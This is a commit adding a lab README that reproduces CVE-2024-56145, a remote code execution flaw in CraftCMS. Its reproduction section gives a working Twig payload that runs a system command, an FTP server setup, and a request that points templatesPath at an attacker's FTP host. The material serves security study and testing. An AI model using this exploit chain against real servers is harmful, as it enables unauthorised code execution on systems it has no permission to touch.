first commit

craftcms/CVE-2024-56145/README.md

@@ -0,0 +1,52 @@
+# CraftCMS `register_argc_argv` Leads to Remote Code Execution (CVE-2024-56145)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+CraftCMS is a PHP-based content management system for building websites and applications.
+
+CraftCMS version before 5.5.2 and 4.13.2 is vulnerable to remote code execution if the PHP setting `register_argc_argv` is enabled. When `register_argc_argv` is enabled, CraftCMS incorrectly reads configuration items from the HTTP request, allowing an attacker to control template files using the `--templatesPath`, which can lead to arbitrary code execution through template injection.
+
+Reference:
+
+- <https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9>
+- <https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms>
+
+## Vulnerable Environment
+
+Execute the following command to start a CraftCMS server 5.5.1.1:
+
+```
+docker-compose up -d
+```
+
+After the server is running, you can see the installation page at `http://<your-ip>:8088/admin/install`. Please follow the instructions to install CraftCMS, the default database address is `db` and the username and password are both `root`.
+
+![](1.png)
+
+## Vulnerability Reproduction
+
+To reproduce the vulnerability, you need to prepare a craft `index.twig` file which contains the following content, then place it on any remote server:
+
+```twig
+{{ ['system', 'id'] | sort('call_user_func') | join('') }}
+```
+
+Then start a FTP server in the server where the `index.twig` file is located:
+
+```bash
+# install pyftpdlib
+pip install pyftpdlib
+
+# start a FTP server
+python -m pyftpdlib -p 21212 -V
+```
+
+Then you can exploit the vulnerability by sending the following request:
+
+```
+http://<your-ip>:8088/?--templatesPath=ftp://<evil-ip>:21212/
+```
+
+![](2.png)
+
+As you can see, the `id` command is executed and the output is returned.